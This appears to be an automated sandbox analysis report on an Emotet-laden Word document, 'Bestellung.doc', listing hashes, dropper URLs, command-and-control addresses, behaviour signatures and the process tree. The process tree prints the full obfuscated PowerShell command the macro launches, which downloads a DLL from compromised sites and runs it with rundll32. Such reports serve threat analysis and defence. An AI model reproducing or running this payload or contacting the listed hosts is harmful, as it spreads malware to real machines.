Analysis

  • max time kernel
    69s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    06-01-2021 19:54

General

  • Target

    Bestellung.doc

  • Size

    144KB

  • MD5

    1a5af385cbcae3e14b1cd5a1c698c7dc

  • SHA1

    76c6532ff6384608476351196e8c91ca86665b60

  • SHA256

    c772359c2dd61b41718226e30d13a19044799f24fd8f62b3d595d4c5b1bd166a

  • SHA512

    80d4b93b4cfd61d987d693d914da981e2ec856289dac4b8f6188b234d51a0a5e05cde3f342765c584704963a88a03df847efd1a689f99198164cf081e9ceb83e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://obob.tv/content/rpKmYv/

exe.dropper

http://infoprocenter.com/wp-admin/MSInfo/

exe.dropper

http://miprimercamino.com/cgi-bin/AJ09AzChrK/

exe.dropper

http://mobilepro-tm.online/wp-admin/VGX/

exe.dropper

https://www.terrakulturegallery.com/wp-admin/ZNg6V7pv/

exe.dropper

http://bingdaofuzhu.com/wp-content/L/

Extracted

Family

emotet

Botnet

Epoch3

C2

125.0.215.60:80

163.53.204.180:443

89.163.210.141:8080

203.157.152.9:7080

157.245.145.87:443

82.78.179.117:443

85.247.144.202:80

37.46.129.215:8080

110.37.224.243:80

192.210.217.94:8080

2.82.75.215:80

69.159.11.38:443

188.166.220.180:7080

103.93.220.182:80

198.20.228.9:8080

91.75.75.46:80

88.247.30.64:80

189.211.214.19:443

203.160.167.243:80

178.33.167.120:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bestellung.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1580
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwBFAFQALQBpAFQARQBNACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBrADYASQAgACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAJwBUAE8AUgBZACcALAAnAHMAeQBzAHQAZQAnACwAJwBkACcALAAnAGkAcgBFAGMAJwAsACcATQAuAGkAbwAuACcAKQAgACkAIAAgADsAIAAgAHMAdgAgACAAKAAiADQAIgArACIARQAzACIAKQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsANwB9AHsANgB9AHsAOAB9AHsAMQB9AHsAMwB9AHsANAB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBuAEEAZwBlAFIAJwAsACcASQBDACcALAAnAHMAWQBTACcALAAnAGUAJwAsACcAcABvAEkATgB0AG0AJwAsACcAQQAnACwAJwBFACcALAAnAFQAZQBNAC4ATgAnACwAJwBUAC4AcwBlAFIAdgAnACkAKQAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACcAaQAnACsAKAAnAGwAJwArACcAZQBuAHQAbAAnACsAJwB5AEMAJwArACcAbwBuAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQAQwBfADEAOAA1AHoANQA9ACQAVwAxADAAQQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgAwADQATgA7ACQASAA1ADkAVgA9ACgAJwBJACcAKwAoACcAMAAnACsAJwAzAEgAJwApACkAOwAgACgAIAAgAEcASQAgACAAVgBBAFIASQBBAGIATABFADoAawA2AGkAKQAuAHYAYQBsAHUAZQA6ADoAIgBjAGAAUgBFAGAAQQBUAGUAZABgAEkAcgBlAGMAYABUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBjAFAAMQAnACsAJwBEACcAKQArACcAOQAnACsAJwBlADkAJwArACgAJwB1ADkAJwArACcAaQBjAFAAJwArACcAMQBGAGYAbgAnACsAJwBoAGQAJwApACsAKAAnAGEAJwArACcAawBjACcAKQArACcAUAAxACcAKQAuACIAcgBgAEUAcABMAEEAYABDAEUAIgAoACgAWwBDAGgAYQBSAF0AOQA5ACsAWwBDAGgAYQBSAF0AOAAwACsAWwBDAGgAYQBSAF0ANAA5ACkALABbAFMAdABSAEkATgBHAF0AWwBDAGgAYQBSAF0AOQAyACkAKQApADsAJABCADUANgBXAD0AKAAoACcAWgAnACsAJwA3ADIAJwApACsAJwBTACcAKQA7ACAAIAAoAEcARQBUAC0ASQB0AGUATQAgACAAKAAnAFYAYQBSACcAKwAnAEkAJwArACcAYQBiACcAKwAnAEwAZQA6ADQARQAzACcAKQApAC4AdgBhAGwAdQBlADoAOgAiAHMARQBjAFUAYABSAEkAVABZAHAAcgBgAG8AdABgAE8AYwBPAGwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFUAMQA4AFUAPQAoACcAVAAwACcAKwAnADAASAAnACkAOwAkAFUAMwB2ADYAbABjAG4AIAA9ACAAKAAoACcAQQAwACcAKwAnADUAJwApACsAJwBEACcAKQA7ACQAVwA5ADUARgA9ACgAJwBJACcAKwAoACcAMAAnACsAJwA4AFQAJwApACkAOwAkAEEAMQBnAHEAcgBoAG0APQAkAEgATwBNAEUAKwAoACgAKAAnAE8AJwArACcAMgAwAEQAOQAnACkAKwAnAGUAJwArACgAJwA5AHUAOQAnACsAJwBpACcAKwAnAE8AMgAnACsAJwAwAEYAZgBuAGgAZAAnACsAJwBhAGsATwAyACcAKQArACcAMAAnACkALgAiAHIAZQBgAHAATABgAEEAQwBFACIAKAAoAFsAYwBIAGEAcgBdADcAOQArAFsAYwBIAGEAcgBdADUAMAArAFsAYwBIAGEAcgBdADQAOAApACwAWwBTAFQAcgBpAG4AZwBdAFsAYwBIAGEAcgBdADkAMgApACkAKwAkAFUAMwB2ADYAbABjAG4AKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABMADYAMQBNAD0AKAAnAFAAJwArACgAJwA5ADcAJwArACcASQAnACkAKQA7ACQAQwBoAGYAegAzAGgAYwA9ACgAKAAnAF0AJwArACcAYQBuACcAKQArACgAJwB3AFsAMwAnACsAJwBzADoAJwApACsAKAAnAC8ALwBvAGIAbwBiACcAKwAnAC4AJwArACcAdAB2AC8AJwArACcAYwBvAG4AdABlACcAKQArACgAJwBuAHQALwAnACsAJwByACcAKQArACgAJwBwAEsAbQAnACsAJwBZAHYAJwApACsAKAAnAC8AQAAnACsAJwBdACcAKQArACgAJwBhACcAKwAnAG4AdwBbADMAOgAvACcAKwAnAC8AaQAnACkAKwAnAG4AJwArACgAJwBmAG8AJwArACcAcAByAG8AJwArACcAYwBlACcAKQArACcAbgB0ACcAKwAoACcAZQAnACsAJwByAC4AYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAnAHcAJwArACcAcAAnACsAKAAnAC0AYQAnACsAJwBkAG0AaQAnACkAKwAoACcAbgAvAE0AJwArACcAUwBJACcAKwAnAG4AZgBvAC8AJwArACcAQABdAGEAJwArACcAbgB3AFsAJwArACcAMwA6AC8ALwAnACkAKwAoACcAbQBpAHAAcgAnACsAJwBpAG0AZQByACcAKwAnAGMAJwArACcAYQBtAGkAbgBvAC4AYwAnACkAKwAoACcAbwBtAC8AJwArACcAYwBnAGkAJwApACsAKAAnAC0AYgBpACcAKwAnAG4ALwAnACkAKwAnAEEASgAnACsAKAAnADAAOQAnACsAJwBBAHoAJwApACsAJwBDACcAKwAoACcAaAAnACsAJwByAEsALwAnACsAJwBAAF0AYQAnACsAJwBuAHcAWwAzACcAKQArACgAJwA6AC8ALwBtACcAKwAnAG8AYgBpACcAKwAnAGwAZQBwAHIAbwAtAHQAbQAnACsAJwAuAG8AJwApACsAJwBuACcAKwAoACcAbABpAG4AZQAvAHcAcAAtAGEAJwArACcAZABtAGkAbgAnACsAJwAvACcAKwAnAFYAJwApACsAKAAnAEcAWAAnACsAJwAvAEAAJwApACsAJwBdAGEAJwArACcAbgB3ACcAKwAnAFsAJwArACgAJwAzAHMAOgAnACsAJwAvACcAKwAnAC8AdwAnACkAKwAoACcAdwAnACsAJwB3AC4AdAAnACkAKwAoACcAZQAnACsAJwByAHIAJwApACsAJwBhAGsAJwArACgAJwB1AGwAdAB1AHIAJwArACcAZQBnACcAKQArACcAYQBsACcAKwAnAGwAZQAnACsAJwByAHkAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwAC0AYQAnACkAKwAoACcAZABtACcAKwAnAGkAbgAvAFoAJwApACsAJwBOACcAKwAnAGcANgAnACsAKAAnAFYANwBwAHYALwAnACsAJwBAAF0AYQBuACcAKwAnAHcAWwAzACcAKwAnADoALwAnACsAJwAvAGIAJwApACsAJwBpAG4AJwArACgAJwBnAGQAYQAnACsAJwBvAGYAdQB6ACcAKQArACgAJwBoAHUALgAnACsAJwBjAG8AJwArACcAbQAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjAG8AbgAnACsAJwB0AGUAbgAnACkAKwAnAHQALwAnACsAJwBMAC8AJwApAC4AIgByAEUAYABwAEwAYABBAGMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AJwArACcAdwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBzAHAAbABgAEkAdAAiACgAJABGADgAXwBUACAAKwAgACQAQwBfADEAOAA1AHoANQAgACsAIAAkAE0AMQBfAEsAKQA7ACQARwAxADUARgA9ACgAJwBFADMAJwArACcAXwBSACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASgA3AGsAbwBuAHIAMgAgAGkAbgAgACQAQwBoAGYAegAzAGgAYwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwB5AFMAdABlAG0ALgBuAGUAVAAuAFcARQBCAEMAbABpAEUATgBUACkALgAiAGQATwBgAFcAbgBMAGAAbwBhAGAARABmAEkAbABFACIAKAAkAEoANwBrAG8AbgByADIALAAgACQAQQAxAGcAcQByAGgAbQApADsAJABZADQAXwBZAD0AKAAnAEcAOQAnACsAJwA0AFIAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEEAMQBnAHEAcgBoAG0AKQAuACIAbABlAGAATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA0ADcANwApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABBADEAZwBxAHIAaABtACwAKAAoACcAQwBvAG4AdAAnACsAJwByACcAKQArACgAJwBvAGwAJwArACcAXwAnACkAKwAnAFIAJwArACgAJwB1ACcAKwAnAG4ARAAnACkAKwAnAEwATAAnACkALgAiAFQAbwBgAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAEYAMQA2AEsAPQAoACgAJwBWADcAJwArACcAMQAnACkAKwAnAE8AJwApADsAYgByAGUAYQBrADsAJABYADQAMwBQAD0AKAAnAEQAOQAnACsAJwA5AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAF8ANgBUAD0AKAAnAFMAMQAnACsAJwAyAFkAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD cwBFAFQALQBpAFQARQBNACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBrADYASQAgACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAJwBUAE8AUgBZACcALAAnAHMAeQBzAHQAZQAnACwAJwBkACcALAAnAGkAcgBFAGMAJwAsACcATQAuAGkAbwAuACcAKQAgACkAIAAgADsAIAAgAHMAdgAgACAAKAAiADQAIgArACIARQAzACIAKQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsANwB9AHsANgB9AHsAOAB9AHsAMQB9AHsAMwB9AHsANAB9AHsANQB9AHsAMAB9ACIAIAAtAEYAJwBuAEEAZwBlAFIAJwAsACcASQBDACcALAAnAHMAWQBTACcALAAnAGUAJwAsACcAcABvAEkATgB0AG0AJwAsACcAQQAnACwAJwBFACcALAAnAFQAZQBNAC4ATgAnACwAJwBUAC4AcwBlAFIAdgAnACkAKQAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAJwArACcAaQAnACsAKAAnAGwAJwArACcAZQBuAHQAbAAnACsAJwB5AEMAJwArACcAbwBuAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQAQwBfADEAOAA1AHoANQA9ACQAVwAxADAAQQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgAwADQATgA7ACQASAA1ADkAVgA9ACgAJwBJACcAKwAoACcAMAAnACsAJwAzAEgAJwApACkAOwAgACgAIAAgAEcASQAgACAAVgBBAFIASQBBAGIATABFADoAawA2AGkAKQAuAHYAYQBsAHUAZQA6ADoAIgBjAGAAUgBFAGAAQQBUAGUAZABgAEkAcgBlAGMAYABUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBjAFAAMQAnACsAJwBEACcAKQArACcAOQAnACsAJwBlADkAJwArACgAJwB1ADkAJwArACcAaQBjAFAAJwArACcAMQBGAGYAbgAnACsAJwBoAGQAJwApACsAKAAnAGEAJwArACcAawBjACcAKQArACcAUAAxACcAKQAuACIAcgBgAEUAcABMAEEAYABDAEUAIgAoACgAWwBDAGgAYQBSAF0AOQA5ACsAWwBDAGgAYQBSAF0AOAAwACsAWwBDAGgAYQBSAF0ANAA5ACkALABbAFMAdABSAEkATgBHAF0AWwBDAGgAYQBSAF0AOQAyACkAKQApADsAJABCADUANgBXAD0AKAAoACcAWgAnACsAJwA3ADIAJwApACsAJwBTACcAKQA7ACAAIAAoAEcARQBUAC0ASQB0AGUATQAgACAAKAAnAFYAYQBSACcAKwAnAEkAJwArACcAYQBiACcAKwAnAEwAZQA6ADQARQAzACcAKQApAC4AdgBhAGwAdQBlADoAOgAiAHMARQBjAFUAYABSAEkAVABZAHAAcgBgAG8AdABgAE8AYwBPAGwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFUAMQA4AFUAPQAoACcAVAAwACcAKwAnADAASAAnACkAOwAkAFUAMwB2ADYAbABjAG4AIAA9ACAAKAAoACcAQQAwACcAKwAnADUAJwApACsAJwBEACcAKQA7ACQAVwA5ADUARgA9ACgAJwBJACcAKwAoACcAMAAnACsAJwA4AFQAJwApACkAOwAkAEEAMQBnAHEAcgBoAG0APQAkAEgATwBNAEUAKwAoACgAKAAnAE8AJwArACcAMgAwAEQAOQAnACkAKwAnAGUAJwArACgAJwA5AHUAOQAnACsAJwBpACcAKwAnAE8AMgAnACsAJwAwAEYAZgBuAGgAZAAnACsAJwBhAGsATwAyACcAKQArACcAMAAnACkALgAiAHIAZQBgAHAATABgAEEAQwBFACIAKAAoAFsAYwBIAGEAcgBdADcAOQArAFsAYwBIAGEAcgBdADUAMAArAFsAYwBIAGEAcgBdADQAOAApACwAWwBTAFQAcgBpAG4AZwBdAFsAYwBIAGEAcgBdADkAMgApACkAKwAkAFUAMwB2ADYAbABjAG4AKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABMADYAMQBNAD0AKAAnAFAAJwArACgAJwA5ADcAJwArACcASQAnACkAKQA7ACQAQwBoAGYAegAzAGgAYwA9ACgAKAAnAF0AJwArACcAYQBuACcAKQArACgAJwB3AFsAMwAnACsAJwBzADoAJwApACsAKAAnAC8ALwBvAGIAbwBiACcAKwAnAC4AJwArACcAdAB2AC8AJwArACcAYwBvAG4AdABlACcAKQArACgAJwBuAHQALwAnACsAJwByACcAKQArACgAJwBwAEsAbQAnACsAJwBZAHYAJwApACsAKAAnAC8AQAAnACsAJwBdACcAKQArACgAJwBhACcAKwAnAG4AdwBbADMAOgAvACcAKwAnAC8AaQAnACkAKwAnAG4AJwArACgAJwBmAG8AJwArACcAcAByAG8AJwArACcAYwBlACcAKQArACcAbgB0ACcAKwAoACcAZQAnACsAJwByAC4AYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAnAHcAJwArACcAcAAnACsAKAAnAC0AYQAnACsAJwBkAG0AaQAnACkAKwAoACcAbgAvAE0AJwArACcAUwBJACcAKwAnAG4AZgBvAC8AJwArACcAQABdAGEAJwArACcAbgB3AFsAJwArACcAMwA6AC8ALwAnACkAKwAoACcAbQBpAHAAcgAnACsAJwBpAG0AZQByACcAKwAnAGMAJwArACcAYQBtAGkAbgBvAC4AYwAnACkAKwAoACcAbwBtAC8AJwArACcAYwBnAGkAJwApACsAKAAnAC0AYgBpACcAKwAnAG4ALwAnACkAKwAnAEEASgAnACsAKAAnADAAOQAnACsAJwBBAHoAJwApACsAJwBDACcAKwAoACcAaAAnACsAJwByAEsALwAnACsAJwBAAF0AYQAnACsAJwBuAHcAWwAzACcAKQArACgAJwA6AC8ALwBtACcAKwAnAG8AYgBpACcAKwAnAGwAZQBwAHIAbwAtAHQAbQAnACsAJwAuAG8AJwApACsAJwBuACcAKwAoACcAbABpAG4AZQAvAHcAcAAtAGEAJwArACcAZABtAGkAbgAnACsAJwAvACcAKwAnAFYAJwApACsAKAAnAEcAWAAnACsAJwAvAEAAJwApACsAJwBdAGEAJwArACcAbgB3ACcAKwAnAFsAJwArACgAJwAzAHMAOgAnACsAJwAvACcAKwAnAC8AdwAnACkAKwAoACcAdwAnACsAJwB3AC4AdAAnACkAKwAoACcAZQAnACsAJwByAHIAJwApACsAJwBhAGsAJwArACgAJwB1AGwAdAB1AHIAJwArACcAZQBnACcAKQArACcAYQBsACcAKwAnAGwAZQAnACsAJwByAHkAJwArACgAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwAC0AYQAnACkAKwAoACcAZABtACcAKwAnAGkAbgAvAFoAJwApACsAJwBOACcAKwAnAGcANgAnACsAKAAnAFYANwBwAHYALwAnACsAJwBAAF0AYQBuACcAKwAnAHcAWwAzACcAKwAnADoALwAnACsAJwAvAGIAJwApACsAJwBpAG4AJwArACgAJwBnAGQAYQAnACsAJwBvAGYAdQB6ACcAKQArACgAJwBoAHUALgAnACsAJwBjAG8AJwArACcAbQAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjAG8AbgAnACsAJwB0AGUAbgAnACkAKwAnAHQALwAnACsAJwBMAC8AJwApAC4AIgByAEUAYABwAEwAYABBAGMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AJwArACcAdwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBzAHAAbABgAEkAdAAiACgAJABGADgAXwBUACAAKwAgACQAQwBfADEAOAA1AHoANQAgACsAIAAkAE0AMQBfAEsAKQA7ACQARwAxADUARgA9ACgAJwBFADMAJwArACcAXwBSACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASgA3AGsAbwBuAHIAMgAgAGkAbgAgACQAQwBoAGYAegAzAGgAYwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0AJwArACcATwBiAGoAZQBjACcAKwAnAHQAJwApACAAUwB5AFMAdABlAG0ALgBuAGUAVAAuAFcARQBCAEMAbABpAEUATgBUACkALgAiAGQATwBgAFcAbgBMAGAAbwBhAGAARABmAEkAbABFACIAKAAkAEoANwBrAG8AbgByADIALAAgACQAQQAxAGcAcQByAGgAbQApADsAJABZADQAXwBZAD0AKAAnAEcAOQAnACsAJwA0AFIAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEEAMQBnAHEAcgBoAG0AKQAuACIAbABlAGAATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA0ADcANwApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABBADEAZwBxAHIAaABtACwAKAAoACcAQwBvAG4AdAAnACsAJwByACcAKQArACgAJwBvAGwAJwArACcAXwAnACkAKwAnAFIAJwArACgAJwB1ACcAKwAnAG4ARAAnACkAKwAnAEwATAAnACkALgAiAFQAbwBgAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAEYAMQA2AEsAPQAoACgAJwBWADcAJwArACcAMQAnACkAKwAnAE8AJwApADsAYgByAGUAYQBrADsAJABYADQAMwBQAD0AKAAnAEQAOQAnACsAJwA5AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAF8ANgBUAD0AKAAnAFMAMQAnACsAJwAyAFkAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1756
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\D9e9u9i\Ffnhdak\A05D.dll Control_RunDLL
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:884
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\D9e9u9i\Ffnhdak\A05D.dll Control_RunDLL
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vqrpohhijzz\qbodzjrwvj.xli",Control_RunDLL
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1180

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\D9e9u9i\Ffnhdak\A05D.dll
      MD5

      02917a061ab8ffb22011549f55d5c546

      SHA1

      903697858ee1e2449faac06367f60e212d214fbf

      SHA256

      5c8b2e90891d3d7815277b7c85f0f9d0a703f9f02c78fd79b5f0e1bd9f25dbfc

      SHA512

      a73eb8ecc768c58edf252c8a2298bfbbeeb69f8a1f96d52ec5efd3ce6bbd010f56ae349a7dee7fefe1c6ad22b4ad56bd4812e5734532516d879c87b1589b02c5

    • \Users\Admin\D9e9u9i\Ffnhdak\A05D.dll
      MD5

      02917a061ab8ffb22011549f55d5c546

      SHA1

      903697858ee1e2449faac06367f60e212d214fbf

      SHA256

      5c8b2e90891d3d7815277b7c85f0f9d0a703f9f02c78fd79b5f0e1bd9f25dbfc

      SHA512

      a73eb8ecc768c58edf252c8a2298bfbbeeb69f8a1f96d52ec5efd3ce6bbd010f56ae349a7dee7fefe1c6ad22b4ad56bd4812e5734532516d879c87b1589b02c5

    • \Users\Admin\D9e9u9i\Ffnhdak\A05D.dll
      MD5

      02917a061ab8ffb22011549f55d5c546

      SHA1

      903697858ee1e2449faac06367f60e212d214fbf

      SHA256

      5c8b2e90891d3d7815277b7c85f0f9d0a703f9f02c78fd79b5f0e1bd9f25dbfc

      SHA512

      a73eb8ecc768c58edf252c8a2298bfbbeeb69f8a1f96d52ec5efd3ce6bbd010f56ae349a7dee7fefe1c6ad22b4ad56bd4812e5734532516d879c87b1589b02c5

    • \Users\Admin\D9e9u9i\Ffnhdak\A05D.dll
      MD5

      02917a061ab8ffb22011549f55d5c546

      SHA1

      903697858ee1e2449faac06367f60e212d214fbf

      SHA256

      5c8b2e90891d3d7815277b7c85f0f9d0a703f9f02c78fd79b5f0e1bd9f25dbfc

      SHA512

      a73eb8ecc768c58edf252c8a2298bfbbeeb69f8a1f96d52ec5efd3ce6bbd010f56ae349a7dee7fefe1c6ad22b4ad56bd4812e5734532516d879c87b1589b02c5

    • \Users\Admin\D9e9u9i\Ffnhdak\A05D.dll
      MD5

      02917a061ab8ffb22011549f55d5c546

      SHA1

      903697858ee1e2449faac06367f60e212d214fbf

      SHA256

      5c8b2e90891d3d7815277b7c85f0f9d0a703f9f02c78fd79b5f0e1bd9f25dbfc

      SHA512

      a73eb8ecc768c58edf252c8a2298bfbbeeb69f8a1f96d52ec5efd3ce6bbd010f56ae349a7dee7fefe1c6ad22b4ad56bd4812e5734532516d879c87b1589b02c5

    • memory/884-12-0x0000000000000000-mapping.dmp
    • memory/1180-21-0x0000000000230000-0x0000000000252000-memory.dmp
      Filesize

      136KB

    • memory/1180-20-0x0000000000000000-mapping.dmp
    • memory/1232-22-0x000007FEF6780000-0x000007FEF69FA000-memory.dmp
      Filesize

      2.5MB

    • memory/1508-19-0x0000000000290000-0x00000000002B2000-memory.dmp
      Filesize

      136KB

    • memory/1508-14-0x0000000000000000-mapping.dmp
    • memory/1580-2-0x0000000000840000-0x0000000000842000-memory.dmp
      Filesize

      8KB

    • memory/1632-3-0x0000000000000000-mapping.dmp
    • memory/1756-11-0x000000001C4A0000-0x000000001C4A1000-memory.dmp
      Filesize

      4KB

    • memory/1756-5-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp
      Filesize

      9.9MB

    • memory/1756-4-0x0000000000000000-mapping.dmp
    • memory/1756-6-0x0000000002380000-0x0000000002381000-memory.dmp
      Filesize

      4KB

    • memory/1756-7-0x000000001AC80000-0x000000001AC81000-memory.dmp
      Filesize

      4KB

    • memory/1756-8-0x00000000023C0000-0x00000000023C1000-memory.dmp
      Filesize

      4KB

    • memory/1756-10-0x000000001C360000-0x000000001C361000-memory.dmp
      Filesize

      4KB

    • memory/1756-9-0x0000000001FA0000-0x0000000001FA1000-memory.dmp
      Filesize

      4KB